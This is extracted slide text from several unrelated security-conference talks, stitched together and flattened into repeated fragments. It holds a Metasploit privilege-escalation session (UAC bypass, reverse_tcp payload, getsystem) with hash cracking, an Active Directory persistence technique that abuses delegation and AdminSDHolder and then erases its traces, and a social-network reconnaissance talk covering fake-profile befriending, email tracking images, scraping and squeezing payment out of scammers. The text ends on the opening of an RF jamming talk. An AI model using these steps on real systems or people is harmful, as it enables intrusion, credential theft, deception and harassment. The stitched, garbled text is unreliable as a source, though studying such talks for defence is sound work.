Run Keys • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run • HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run • Service Install Date PRIVILEGE ESCALATION In order to scrape hashes, the attacker needs to change security context from user to Local System (SID S-1-5-18) User Administrator LOCAL SYSTEM PRIVILEGE ESCALATION Using Kali after I’ve already compromised the system using a Java exploit. meterpreter > run post/windows/gather/win_privs meterpreter > background msf exploit(java_signed_applet) > use exploit/windows/local/bypassuac msf exploit(bypassuac) > set SESSION 1 SESSION => 1 msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(bypassuac) > set LHOST LHOST => msf exploit(bypassuac) > set LPORT 8088 LPORT => 8088 msf exploit(bypassuac) > exploit meterpreter > getuid Server username: OHNOES\ImaUser meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM PRIVILEGE ESCALATION SCRAPING HASHES • Service Install Process Start SCRAPING HASHES • Service Install Process Start SCRAPING HASHES Volatility – consoles command CRACKING NT HASHES • John The Ripper • OCLHashCat (GPU) • Ubuntu 14.04 - 8x AMD R9 290X can do 183528 Mh/s against NTLM, that is 183,528,000,000 tries per second*. • Roughly 9 hours to crack an 8 character password RECON Volatility – consoles or cmdscan RECON – APT STYLE LATERAL MOVEMENT • Event ID 4624 – Logon / Event ID 4634 - Logoff • Type 2 – Interactive • Type 3 - Network Logon • Type 10 – Remote Interactive (RDP) LATERAL MOVEMENT • RDP Pivot • Microsoft-Windows-TerminalServices- LocalSessionManager-Operational Event ID 21 (RDP Logon) • Microsoft-Windows-TerminalServices- LocalSessionManager-Operational Event ID 25 (RDP Reconnect) LATERAL MOVEMENT • RDP Pivot Continued • Default.rdp disk artifact • BMC Cache (bcache22.bmc) QUESTIONS? This slide deck and related links for the videos will be eventually posted on: Cybersecology.com/DEFCON2015 Big thanks to Mike Landeck for allowing me to use his site!
▪ • Relatively Easy to Exploit • Easily Automated • Usually not Monitored ▪ ▪ ▪ ▪ Kerberos ▪ Kerberos Delegation ▪ ▪ Focus on High Privileges ▪ Malicious JIT Administration ▪ ▪ ▪ • Ticket based authentication protocol Domain User AS TGS KDC LSASS (KERBEROS) ST TGT App Server TGT ST ▪ • Why? • An application reusing user credentials • Web server accessing a SQL DB • How? • Request tickets on behalf of the user User1 Web Server SQL Server DC User1 Authentication User1 Ticket Delegated ▪ ▪ • Delegation to any service ▪ • Kerberos Only (S4U2Proxy) • Protocol Transition (S4U2Self + S4U2Proxy) Domain Account or Local System Access NO ACCESS PIVOTING PRIVILEGED PERSISTENCE ACLs CONSTRAINED DELEGATION GPO TAMPERING BUSTED! Pass-The-Hash Pass-The-Ticket BloodHound GoFetch Domain Admin Enterprise Admin Dump NTDS.dit (VSS, DRSUAPI) Detect replication requests from a non-DC machine Golden ticket Detect crafted tickets Skeleton key (or others backdoors) Encryption downgrade ▪ • Accounts holding permanent high privileges serve as valuable targets for attackers • JIT Administration • High privileges are required to perform an operation • Get the required privileges for a limited amount of time • When the time period expires, the high privileges are revoked • Reduces the attack surface ▪ • Get administrative access for a limited time • Perform malicious operations • Leave no traces behind to avoid detection ▪ • Delegation scenario • AdminSDHolder scenario 1 • AdminSDHolder scenario 2 ▪ • Discretionary Access Control List (DACL) • Access control entry (ACE) • Object Ownership DACL User SID Security Group SIDs User Rights Access Token Deny ACEs Allow ACEs Inherited Deny ACEs Inherited Allow ACEs LSA Matches SIDs from The access Token with SIDs in the ACEs ▪ • Add a new machine account • Set machine owner to a malicious account • Owner can edit the ACL of the object ▪ • GPO Tampering: “Enable accounts to be trusted for delegation” ▪ • DACL Modification: • Add ‘GenericAll’ ACE for malicious_user on new machine ▪ • Allow delegation to ‘krbtgt’ • Request ‘Administrator’ TGT • Remove footprints: • Remove delegation • Revert ACL • Perform malicious operations ▪ • Persistence can be obtained by ACL modification of privileged groups – such as ‘Domain Admins’ • Problem: AdminSDHolder! ▪ • SDProp overrides the ACLs of protected groups & users with the AdminSDHolder ACL • Runs periodically (default: 1 hour) • Result: malicious_user loses his permission • Protected accounts: • Enterprise Admins • Domain Admins • Administrators • … ▪ • The following groups can be excluded from the AdminSDHolder protection: • Bit Group to Exclude Binary Value Hexadecimal Value 0 Account Operators 0001 1 1 Server Operators 0010 2 2 Print Operators 0100 4 3 Backup Operators 1000 8 ▪ • Add ACEs to excluded groups • SDProp will not affect the new ACL • Malicious JIT at any time! ▪ • Change the owner of the AdminSDHolder object • Still not allowed to modify group memberships ▪ • Just before SDProp is scheduled to run • Add malicious_user to the AdminSDHolder ACL ▪ • SDProp adds malicious ACE to protected objects ▪ • Add malicious_user to ‘Domain Admins’ group • Obtain administrative TGT • Revert (erase footprints) • Remove malicious_user from AdminSDHolder’s ACL • Force SDProp to run: removes malicious ACE from protected groups • Remove malicious_user from ‘Domain Admins’ group • Entire operation can be automated to run in seconds! ▪ • GPO: ‘Enable accounts to be trusted for delegation’ • Monitor accounts trusted for delegation • ‘AllowedToDelegateTo’ attribute • ‘Account is sensitive and cannot be delegated’ ▪ • ACL • Owner • Excluded groups ▪
Social Networking Special Ops: Extending Data Visualization Tools for Faster Pwnage 1 Chris Sumner | @TheSuggmeister | www.securityg33k.com Tuesday, 3 August 2010 Disclaimer “I am not speaking on behalf of my employer. The information and perspectives I present are personal and do not represent those of my employer.” 2 Tuesday, 3 August 2010 What yer in for… 3 Tuesday, 3 August 2010 What yer in for… 1. Intro to Social Network Analysis & Visualization 3 Tuesday, 3 August 2010 What yer in for… 1. Intro to Social Network Analysis & Visualization 2. Case study using Twitter & Maltego 3 Tuesday, 3 August 2010 What yer in for… 1. Intro to Social Network Analysis & Visualization 2. Case study using Twitter & Maltego 3. Something a bit darker using facebook & Maltego 3 Tuesday, 3 August 2010 Goals 4 Tuesday, 3 August 2010 Goals • Overview/appreciation of possibilities in this field 4 Tuesday, 3 August 2010 Goals • Overview/appreciation of possibilities in this field • Expose you to some ideas that you can apply to your specific situation 4 Tuesday, 3 August 2010 Who’s the talk aimed at? 5 This talk Tuesday, 3 August 2010 Who’s the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs 1337 Tuesday, 3 August 2010 Who’s the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs 1337 Tuesday, 3 August 2010 Who’s the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs 1337 Tuesday, 3 August 2010 Who’s the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs Y’all probably get it 1337 Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6 Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6 • By day – Corporate security Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6 • By day – Corporate security • By night | weekend – Data analysis – Data visualization – Social Media – DC4420 Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6 • By day – Corporate security • By night | weekend – Data analysis – Data visualization – Social Media – DC4420 • A strange sequence of events led to me appearing here Tuesday, 3 August 2010 Social Network Analysis + Target Rich Environment = Problem = Opportunity 7 Tuesday, 3 August 2010 Social Network Analysis Sociogram- Jacob Moreno 1933 8 Tuesday, 3 August 2010 Target Rich Environment 9 Tuesday, 3 August 2010 Target Rich Environment • Data – ~21 exabytes per month 9 Tuesday, 3 August 2010 Target Rich Environment • Data – ~21 exabytes per month • Facebook – ~500 ish million users 9 Tuesday, 3 August 2010 Target Rich Environment • Data – ~21 exabytes per month • Facebook – ~500 ish million users • Privacy paradox – “I take privacy seriously” – 89% use real names – 61% use identifiable picture 9 Tuesday, 3 August 2010 Target Rich Environment • Data – ~21 exabytes per month • Facebook – ~500 ish million users • Privacy paradox – “I take privacy seriously” – 89% use real names – 61% use identifiable picture • “I’ve got nothing to hide and Other Misunderstandings of Privacy” – Daniel Solove 9 Tuesday, 3 August 2010 Problem Your anonymous searches, aren’t all that anonymous 10 Tuesday, 3 August 2010 Problem Your anonymous searches, aren’t all that anonymous 10 • AOL user 4417749 • Ms. Thelma Arnold, Lilburn Georgia Tuesday, 3 August 2010 Opportunity • Lots of data • Lots of noise 11 Tuesday, 3 August 2010 Opportunity • Lots of data • Lots of noise • Find “interesting” stuff a bit faster…. 11 Tuesday, 3 August 2010 Opportunity • Lots of data • Lots of noise • Find “interesting” stuff a bit faster…. …..by combining Data Mining/Screen Scraping, Named Entity Recognition and Data Visualization 11 Tuesday, 3 August 2010 Named Entity Recognition “Parsing data to extract & classify information” 12 Tuesday, 3 August 2010 Named Entity Recognition “Parsing data to extract & classify information” 12 “Greg bought 300,000 shares of LIGATT in 2010” Tuesday, 3 August 2010 Named Entity Recognition “Parsing data to extract & classify information” 12 “Greg bought 300,000 shares of LIGATT in 2010” <ENAMEX TYPE="PERSON">Greg</ENAMEX> bought <NUMEX TYPE="QUANTITY">300,000</NUMEX> shares of <ENAMEX TYPE="ORGANIZATION">LIGATT</ENAMEX> in <TIMEX TYPE="DATE">2010</TIMEX>. Tuesday, 3 August 2010 Data Visualization 13 1. Acquire 2. Parse 3. Filter 4. Mine 5. Represent 6. Refine 7. Interact Ben Fry Tuesday, 3 August 2010 Data Visualization 13 1. Acquire 2. Parse 3. Filter 4. Mine 5. Represent 6. Refine 7. Interact Ben Fry Tuesday, 3 August 2010 Raffael Marty Check out secviz.org 14 Tuesday, 3 August 2010 Tools • Maltego • Processing • Prefuse and PrefuseFlare toolkit • Afterglow • DAVIX (Data Analysis & Visualization Linux) • TouchGraph • Vizster • Graphviz 15 Tuesday, 3 August 2010 16 21 September 2009 What the &$#@! is Maltego? Tuesday, 3 August 2010 Maltego 17 Tuesday, 3 August 2010 Maltego • An information gathering tool that allows you to visually see relationships. 17 Tuesday, 3 August 2010 Maltego • An information gathering tool that allows you to visually see relationships. • Infrastructure – DNS, IP Addresses, URLs, MX Records 17 Tuesday, 3 August 2010 Maltego • An information gathering tool that allows you to visually see relationships. • Infrastructure – DNS, IP Addresses, URLs, MX Records • Human – Email, Phone… 17 Tuesday, 3 August 2010 Maltego • An information gathering tool that allows you to visually see relationships. • Infrastructure – DNS, IP Addresses, URLs, MX Records • Human – Email, Phone… • Other… Extendable by design 17 Tuesday, 3 August 2010 18 www.paterva.com Tuesday, 3 August 2010 18 25% Discount ‘BlackHat’ www.paterva.com Tuesday, 3 August 2010 E.G. 19 Tuesday, 3 August 2010 20 Domains Tuesday, 3 August 2010 21 MX Records Tuesday, 3 August 2010 Web Sites… 22 Tuesday, 3 August 2010 23 21 September 2009 Tuesday, 3 August 2010 24 21 September 2009 Tony Hawk Twitter Hunt versus Maltego Tuesday, 3 August 2010 25 Tuesday, 3 August 2010 26 Tuesday, 3 August 2010 “Guarded by a fearsome troll, NW from a house where you might have to pay money to pass & a sk8park” 27 Tuesday, 3 August 2010 28 Tuesday, 3 August 2010 29 @steven_gill Tuesday, 3 August 2010 30 “cammo netting! You’re a bad man” Tuesday, 3 August 2010 31 @steven_gill Tuesday, 3 August 2010 32 Tuesday, 3 August 2010 I wanted to see a map 33 obviously Tuesday, 3 August 2010 Should be easy enough • Hiders are all friends of @hidingit • Finders all tweet @ifoundone when they find one. • Tony sends out “Found” tweets with #THTH 34 Tuesday, 3 August 2010 Twitter’ll fix it 35 Tuesday, 3 August 2010 Twitter’ll fix it 35 Tuesday, 3 August 2010 Twitter’ll fix it 35 @l0sthighway Tuesday, 3 August 2010 Twitter’ll fix it 35 @l0sthighway Tuesday, 3 August 2010 Hypothesis 36 = = + Tuesday, 3 August 2010 List the Hiders 37 Tuesday, 3 August 2010 Derive @HidingIt 38 @HidingIt Tuesday, 3 August 2010 To Tweets [Search Twitter] 39 Tuesday, 3 August 2010 Tweets 40 Tuesday, 3 August 2010 To Twiiter Affiliation [Convert] 41 Tuesday, 3 August 2010 42 Tuesday, 3 August 2010 To friends of this person 43 Tuesday, 3 August 2010 44 Tuesday, 3 August 2010 “Suggy” 45 Tuesday, 3 August 2010 To Tweets [That this person wrote] 46 Tuesday, 3 August 2010 47 Tuesday, 3 August 2010 Twitter Search Limitations 48 Tuesday, 3 August 2010 Local Transforms If you can call script/program and pass input… AND If you can get your output to STDOUT, THEN you can write a local transform 49 Tuesday, 3 August 2010 50 Tuesday, 3 August 2010 3 x API’s • 2 x REST • 1 x Streaming • PERL & ::LWP e.g. from latest tweet $url = "http://twitter.com/statuses/ user_timeline.xml?count=200&id=" . $entityValue2; 51 Tuesday, 3 August 2010 Gotcha’s • 200 tweet limit • Couldn’t search by date • Max history of 3200 tweets • 150 API calls an hour • 100 people * 3 api calls each = 300 52 Tuesday, 3 August 2010 Whitelisting • 150 versus 20,000 per hour 53 Tuesday, 3 August 2010 54 21 September 2009 Find the winners Tuesday, 3 August 2010 55 Tuesday, 3 August 2010 List of all @mentionee’s 56 Tuesday, 3 August 2010 57 x3 Tony’s @ mentionee’s (potential finders….) Found ATL by @blahblahblah Tuesday, 3 August 2010 58 Repeat for each of Tony’s mentionee’s Tuesday, 3 August 2010 59 Tuesday, 3 August 2010 60 Big graph Tuesday, 3 August 2010 61 FAIL Tuesday, 3 August 2010 A bit less messy 62 Tuesday, 3 August 2010 Centrality layout 63 Tony Hawk HidingIt People Tony mentioned who tweeted with followers of @HidingIt... & vice- versa Tuesday, 3 August 2010 Organic 64 Tuesday, 3 August 2010 Organic 64 Tony HidingIt Me Steven Tuesday, 3 August 2010 Edge Weighted 65 Tony Hawk Hiding It Jerome Case Tuesday, 3 August 2010 So what? What on earth have I been going on about? 66 Jerome Case Steven_Gill Suggy Tuesday, 3 August 2010 @sweetjerome & @tonyhawk 67 Tuesday, 3 August 2010 Lessons learned #1 • Plan 68 Tuesday, 3 August 2010 Lessons learned #2 • Speed/Accuracy bar set to left until you know it works • If you ever think, “that’s weird. Not many results”, it’s probably because your Speed/Accuracy bar isn’t over to the right. 69 Tuesday, 3 August 2010 Lessons learned #3 70 Tuesday, 3 August 2010 Lessons learned #3 • Local transforms open up a world of opportunity 70 Tuesday, 3 August 2010 Lessons learned #3 • Local transforms open up a world of opportunity • Enterprise? Consider the server platform. 70 Tuesday, 3 August 2010 Lessons learned #3 • Local transforms open up a world of opportunity • Enterprise? Consider the server platform. • If you’re going to leverage Twitter API heavily, you should really consider making a whitelisting request 70 Tuesday, 3 August 2010 71 21 September 2009 The Mission Tuesday, 3 August 2010 72 “Just Landed: Processing, Twitter, MetaCarta & Hidden Data” Jer Thorp, using processing Tuesday, 3 August 2010 Graphs for DEC.org.uk 73 ……Check out RowFeeder.com Tuesday, 3 August 2010 74 Tuesday, 3 August 2010 74 Tuesday, 3 August 2010 74 I go chop your dollar... Tuesday, 3 August 2010 Disclaimer “The only way you can tell the truth is through fiction” Via Richard Thieme/his friend at NSA “Events, Names, dates, images etc all changed to protect the innocent and the not so innocent” 75 Tuesday, 3 August 2010 Meet “Jess” 76 Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site • Gets bought quickly at “Buy now price” Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site • Gets bought quickly at “Buy now price” • Jess exchanges emails with the buyer Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site • Gets bought quickly at “Buy now price” • Jess exchanges emails with the buyer • Notification from “paypal” Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site • Gets bought quickly at “Buy now price” • Jess exchanges emails with the buyer • Notification from “paypal” • Jess sends laptop to valid address in UK Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site • Gets bought quickly at “Buy now price” • Jess exchanges emails with the buyer • Notification from “paypal” • Jess sends laptop to valid address in UK • Notice from auction site that buy account had been hacked Tuesday, 3 August 2010 Meet “Jess” 76 • Laptop on auction site • Gets bought quickly at “Buy now price” • Jess exchanges emails with the buyer • Notification from “paypal” • Jess sends laptop to valid address in UK • Notice from auction site that buy account had been hacked • Jess contacts police Tuesday, 3 August 2010 Hypothesis 77 = = + Tuesday, 3 August 2010 Step #1 Where is our scammer? 78 Tuesday, 3 August 2010 Step #1 Where is our scammer? • Need to get email header, but he/she uses webmail…… 78 Tuesday, 3 August 2010 Step #1 Where is our scammer? • Need to get email header, but he/she uses webmail…… • …. So sign up for a blog site like webs.com that also provides logs. 78 Tuesday, 3 August 2010 Step #1 Where is our scammer? • Need to get email header, but he/she uses webmail…… • …. So sign up for a blog site like webs.com that also provides logs. • Send spammer an email message with embedded image. 78 Tuesday, 3 August 2010 Step #1 Where is our scammer? • Need to get email header, but he/she uses webmail…… • …. So sign up for a blog site like webs.com that also provides logs. • Send spammer an email message with embedded image. • Wait 78 Tuesday, 3 August 2010 webs.com visitor logs 79 Tuesday, 3 August 2010 webs.com visitor logs 79 See… Jeremiah Grossman’s talk Tuesday, 3 August 2010 80 Tuesday, 3 August 2010 Step #2 where did package really go? 81 Alice Lagos AkinNotMyRealName@someemail.com AKA : Larry The Cable Guy Newcastle Tuesday, 3 August 2010 Step #2 where did package really go? 81 NS Alice Lagos AkinNotMyRealName@someemail.com AKA : Larry The Cable Guy Newcastle Tuesday, 3 August 2010 82 192.COM Tuesday, 3 August 2010 82 192.COM FAIL Tuesday, 3 August 2010 83 21 September 2009 Alice, Alice, who the &$#@! is Alice? Tuesday, 3 August 2010 Info Gathering 84 • Email addresses • Nick names • Friends • Addresses • Schools • Pictures… lots of pictures Tuesday, 3 August 2010 Info Gathering 84 • Email addresses • Nick names • Friends • Addresses • Schools • Pictures… lots of pictures Tuesday, 3 August 2010 Dominic @Singe White 85 Python Mechanize Beautiful Soup They’d break Facebook ToS so don’t use them. ...wrote some useful facebook transforms for Maltego Tuesday, 3 August 2010 Step #3 Which “Alice” ? 86 Tuesday, 3 August 2010 Step #3 Which “Alice” ? 86 ? Tuesday, 3 August 2010 87 fb -> friends Tuesday, 3 August 2010 88 fb -> location Tuesday, 3 August 2010 88 fb -> location Tuesday, 3 August 2010 How to get sued by Facebook 89 Tuesday, 3 August 2010 How to get sued by Facebook • Pete Warden 89 Tuesday, 3 August 2010 How to get sued by Facebook • Pete Warden • Built his own search engine 89 Tuesday, 3 August 2010 How to get sued by Facebook • Pete Warden • Built his own search engine • 100 machine cluster (running Hadoop) for $10 per hour 89 Tuesday, 3 August 2010 How to get sued by Facebook • Pete Warden • Built his own search engine • 100 machine cluster (running Hadoop) for $10 per hour • Crawled Facebook 89 Tuesday, 3 August 2010 How to get sued by Facebook • Pete Warden • Built his own search engine • 100 machine cluster (running Hadoop) for $10 per hour • Crawled Facebook • 220million profiles (name, location, email) in 10 hours for $100 89 Tuesday, 3 August 2010 How to get sued by Facebook • Pete Warden • Built his own search engine • 100 machine cluster (running Hadoop) for $10 per hour • Crawled Facebook • 220million profiles (name, location, email) in 10 hours for $100 • So don’t do it without asking them nicely, even if you’re Law Enforcement 89 Tuesday, 3 August 2010 220 freakin’ million 90 Tuesday, 3 August 2010 Information Available to All 91 Tuesday, 3 August 2010 Information Available to All • If their privacy is “Everyone”, you’re in. 91 Tuesday, 3 August 2010 Information Available to All • If their privacy is “Everyone”, you’re in. • If not, you can only do so much without being a friend...sort of 91 Tuesday, 3 August 2010 Show me the good stuff 92 Tuesday, 3 August 2010 Show me the good stuff • You could create bad apps & get people to use them,then FQL works nicely with Maltego. – See “Social Zombies” 92 Tuesday, 3 August 2010 Show me the good stuff • You could create bad apps & get people to use them,then FQL works nicely with Maltego. – See “Social Zombies” • You could just make friends with people and adopt @singe’s approach – See “Satan is on your friends list” 92 Tuesday, 3 August 2010 Show me the good stuff • You could create bad apps & get people to use them,then FQL works nicely with Maltego. – See “Social Zombies” • You could just make friends with people and adopt @singe’s approach – See “Satan is on your friends list” • Or maybe you’re smart, like TheHarmonyGuy 92 Tuesday, 3 August 2010 Step #4 Making New Friends 93 Tuesday, 3 August 2010 Step #4 Making New Friends • Create a credible account 93 Tuesday, 3 August 2010 Step #4 Making New Friends • Create a credible account • Build up your identity 93 Tuesday, 3 August 2010 Step #4 Making New Friends • Create a credible account • Build up your identity • Don’t go directly for your target – Join similar Groups/Universities/Schools etc – Friends of friends – Target 93 Tuesday, 3 August 2010 Step #4 Making New Friends • Create a credible account • Build up your identity • Don’t go directly for your target – Join similar Groups/Universities/Schools etc – Friends of friends – Target • Over 1000 friends? They’re “easy” 93 Tuesday, 3 August 2010 Step #4 Making New Friends • Create a credible account • Build up your identity • Don’t go directly for your target – Join similar Groups/Universities/Schools etc – Friends of friends – Target • Over 1000 friends? They’re “easy” • Take your time 93 Tuesday, 3 August 2010 Step #4 Making New Friends • Create a credible account • Build up your identity • Don’t go directly for your target – Join similar Groups/Universities/Schools etc – Friends of friends – Target • Over 1000 friends? They’re “easy” • Take your time • or automate it and get the nasty business over with 93 Tuesday, 3 August 2010 Will you be my friend? 94 Tuesday, 3 August 2010 Will you be my friend? 94 Hey, do I know you? Tuesday, 3 August 2010 Will you be my friend? 94 Hey, do I know you? < SHIT !!! > Tuesday, 3 August 2010 Will you be my friend? 94 Hey, do I know you? I’m a friend of “Alice”’s, just getting started and that. I added a few people and might have added too many. < SHIT !!! > Tuesday, 3 August 2010 Will you be my friend? 94 Hey, do I know you? I’m a friend of “Alice”’s, just getting started and that. I added a few people and might have added too many. < SHIT !!! > hehehe man cool, well “Alice”’s my best friend lol Tuesday, 3 August 2010 Step #5 Building a map of interesting peoples Until EOFriends { Get friend Get location IF (location = Nigeria|Lagos|…) { Scrape & Parse wall posts } Download photos IF (wallPosts contain “phrases”) { Download interesting wall posts } IF (“interesting”) { Pipe back to Maltego} } 95 Tuesday, 3 August 2010 To Facebook Friends 96 Tuesday, 3 August 2010 97 Tuesday, 3 August 2010 “Interesting” People 98 Tuesday, 3 August 2010 99 Tuesday, 3 August 2010 “7k in 5 days” • Fast money • Flashy rides • Expensive clothes • HOT chicks • Luxury apartment • “Its really easy to spot a yahoo boy in Nigeria, their lifestyle is pretty much the same, living the young Nigerian dream” 100 Tuesday, 3 August 2010 “I GET PAID IN POUNDS BUT I COLLECTED IN NAIRA CASH” 101 PS3 4 SALE....UK PAL.NEW Tuesday, 3 August 2010 102 Tuesday, 3 August 2010 103 “Arrrrrgh!” Tuesday, 3 August 2010 104 Tuesday, 3 August 2010 What’s the attraction? • Avg month salary – $4,000 USA – ~$200 Nigeria • Scamming pays roughly $700 to $6,000 per/month* 105 Tuesday, 3 August 2010 Call to Action “12.4 MILLION PEOPLE RECORDED DEAD AFTER BEING SCAMMED BY NIGERIA SCAMMERS 2009. 919 MILLION DOLLARS RECORD SCAMMED FOR THE YEAR 2009 BY SAME NIGERIA SCAMMERS. WE ARE TRYING OHH THIS 2010 LETS SCAM 20 BILLION POUNDS AFTER ALL IS NOT YET UP TO AMOUNT OF NIGERIANS TRADED FOR SLAVERY IN 1905(start working)” 106 Tuesday, 3 August 2010 How about something a little more nefarious? 107 21 September 2009 Tuesday, 3 August 2010 How about something a little more nefarious? 107 21 September 2009 Tuesday, 3 August 2010 108 Tuesday, 3 August 2010 B…………………LING BLING 109 Tuesday, 3 August 2010 Gats 110 Tuesday, 3 August 2010 Links with terror? • In 2008 and 2009 there was evidence directly linking 419 AFF networks to (attempted) attacks 419 Advance Fee Fraud Statistics 2009 (Ultrascan Advanced Global Investiagtions) 111 Tuesday, 3 August 2010 Step #6 The true identity of the scammer? 112 Tuesday, 3 August 2010 Step #6 The true identity of the scammer? 112 Hey, it’s Alice, this is my new email address... can you help? my facebook is weird, can you send me a wall post? Tuesday, 3 August 2010 Step #6 The true identity of the scammer? 112 Hey, it’s Alice, this is my new email address... can you help? my facebook is weird, can you send me a wall post? Sure Tuesday, 3 August 2010 Step #6 The true identity of the scammer? 112 Hey, it’s Alice, this is my new email address... can you help? my facebook is weird, can you send me a wall post? Sure Thanks.. Hot Stuff Tuesday, 3 August 2010 Step #6 The true identity of the scammer? 112 Hey, it’s Alice, this is my new email address... can you help? my facebook is weird, can you send me a wall post? Sure Thanks.. Hot Stuff Say hi to XXXXX Tuesday, 3 August 2010 Step #6 The true identity of the scammer? 112 Hey, it’s Alice, this is my new email address... can you help? my facebook is weird, can you send me a wall post? Sure Thanks.. Hot Stuff Say hi to XXXXX BONUS!!!!> Tuesday, 3 August 2010 113 Tuesday, 3 August 2010 Connections 114 Alice Tuesday, 3 August 2010 Connections 114 NS Alice Tuesday, 3 August 2010 Connections 114 NS UKS Alice Tuesday, 3 August 2010 Scammer Networks (on record) 115 Tuesday, 3 August 2010 Scammer Networks (on record) • 62 in UK alone 115 Tuesday, 3 August 2010 Scammer Networks (on record) • 62 in UK alone • Spain highest with 72 115 Tuesday, 3 August 2010 Scammer Networks (on record) • 62 in UK alone • Spain highest with 72 • USA have 53 115 Tuesday, 3 August 2010 Scammer Networks (on record) • 62 in UK alone • Spain highest with 72 • USA have 53 • 916 around the world 115 Tuesday, 3 August 2010 Scammer Networks (on record) • 62 in UK alone • Spain highest with 72 • USA have 53 • 916 around the world • with 16,626 members 115 Tuesday, 3 August 2010 Scammer Networks (on record) • 62 in UK alone • Spain highest with 72 • USA have 53 • 916 around the world • with 16,626 members • Raking in $9.3 billion dollars in 2009 115 Tuesday, 3 August 2010 Step #7 Gettin paid (in full) 116 Tuesday, 3 August 2010 Step #7 Gettin paid (in full) • The Carrot/Stick – Compile all info into a blog post – Create a facebook fan site 116 Tuesday, 3 August 2010 Step #7 Gettin paid (in full) • The Carrot/Stick – Compile all info into a blog post – Create a facebook fan site • Email the scammers – Remind them that google will soon index them 116 Tuesday, 3 August 2010 Step #7 Gettin paid (in full) • The Carrot/Stick – Compile all info into a blog post – Create a facebook fan site • Email the scammers – Remind them that google will soon index them • Follow up with a call 116 Tuesday, 3 August 2010 Step #7 Gettin paid (in full) • The Carrot/Stick – Compile all info into a blog post – Create a facebook fan site • Email the scammers – Remind them that google will soon index them • Follow up with a call • Agree amicable terms 116 Tuesday, 3 August 2010 $ mv <scammers$> <my bank> • Cash? • Bank? • paypal? • Western union? • Amazon Gift Certificates? 117 Tuesday, 3 August 2010 HEALTH WARNING: Messing With Criminals Can Reduce Your Life Expectancy 118 Tuesday, 3 August 2010 HEALTH WARNING: Messing With Criminals Can Reduce Your Life Expectancy 118 To do this you are either: Tuesday, 3 August 2010 HEALTH WARNING: Messing With Criminals Can Reduce Your Life Expectancy 118 To do this you are either: • Limited to public info (due to Terms of service) Tuesday, 3 August 2010 HEALTH WARNING: Messing With Criminals Can Reduce Your Life Expectancy 118 To do this you are either: • Limited to public info (due to Terms of service) • Friend up (with your own account) the other potential bad guys and follow their links. You’d need “balls of steel” to do this. Tuesday, 3 August 2010 HEALTH WARNING: Messing With Criminals Can Reduce Your Life Expectancy 118 To do this you are either: • Limited to public info (due to Terms of service) • Friend up (with your own account) the other potential bad guys and follow their links. You’d need “balls of steel” to do this. • Work with Law Enforcement Tuesday, 3 August 2010 HEALTH WARNING: Messing With Criminals Can Reduce Your Life Expectancy 118 To do this you are either: • Limited to public info (due to Terms of service) • Friend up (with your own account) the other potential bad guys and follow their links. You’d need “balls of steel” to do this. • Work with Law Enforcement • You’d have to break ToS. Which will likely have facebook on your back as well as the bad guys. Tuesday, 3 August 2010 Wrappin’ up • Mining data more accessible than ever before • Visualization can help you home in on interesting relationships 119 Tuesday, 3 August 2010 Wrappin’ up • Mining data more accessible than ever before • Visualization can help you home in on interesting relationships • NER can help classify information 119 Tuesday, 3 August 2010 Wrappin’ up • Mining data more accessible than ever before • Visualization can help you home in on interesting relationships • NER can help classify information • Combination of the three to speed up pwnage 119 Tuesday, 3 August 2010 Maltego Tweeters 120 @Singe Dominic White @mubix Rob Fuller @carnal0wnage Chris Gates @Paterva Tuesday, 3 August 2010 Social Network Tweeter 121 @agent0x0 Tom Eston @theharmonyguy Social Hacking @SocialMediaSec Social Media Security @digininga Robin Wood Tuesday, 3 August 2010 Data Mining & Visualization Tweeters 122 @PeteWarden Pete Warden @neilkod Neil Kodner @dacort Damon Cortesi @zrlram @secviz Raffael Marty @secviz Raffael Marty Tuesday, 3 August 2010 123 .com Tuesday, 3 August 2010 124 21 September 2009 Tuesday, 3 August 2010
DEFCON 18 Electronic Weapons Presented by: mage2 Warning Mucking about with the things I am about to talk to you about can and will kill you and all puppies, kittens and laptops around you. So be forewarned. Also transmitting on frequencies you are not licensed for can really piss off the FCC and DHS, depending on what trouble you cause. Warning Part 2 This is a warning to all of those in the room right now. I am a horrid public speaker, I tend to talk fast and can easily get off topic. Now you are thinking why is he up there talking... Well I wanted to bring something to DEFCON, this is my 10th year attending. Things like this is something I am interested in and I want to bring my interests to others. I want to make you ask questions. If you have a question I hope to have a good amount of time after the slides for Q/A, I will also be around after the talk. What we will cover EMP EFI/RFI Lasers Others, etc Electronic Basic Concepts * All conductive material can act as an antenna. * Most electronics are sensitive to voltage spikes. * Most communication based electronics run on relatively low power signals. < 1W * Atomic and Nuclear weapons are not the only sources of EMP. * Voltage is based on the potential difference between the source and the ground. * Ohms law , learn it love it. V over IR squared. * We all know computers and all digital electronics run on binary signals. * This is represented as a square wave between 0v/GND and either 3.3v or 5v * There is a threshold of what the hardware expects to see as a high or a low. * When using transformers , you will trade current for voltage. * RF power diminishes over distance, closer = better. What are we working with RFI/EMI Using RFI/EMI as an attack is usually a DOS type of an attack. You will be creating a signal that is stronger than your target's signal. Your signal can be anything or just noise. These can be one of the easiest tools to aquire/build. RFI/EMI cont. Here are a few of the devices that can be used for this type of attack. ●Spark Gap transmitter. ●Other “off the shelf” transmitters. ●Homebrew transmitters. Spark Gap Transmitter ●The spark gap transmitter was the first device used to transmit data over the air. ●It is a wide band transmitter. ●Simple to build. With components easily sourced. ●Easily designed to output high powers. ●Dangerous at any power level. ●Electrical arc's produce UV light, exposure can cause “sunburn” and damage your eyes. Spark Gap Transmitter 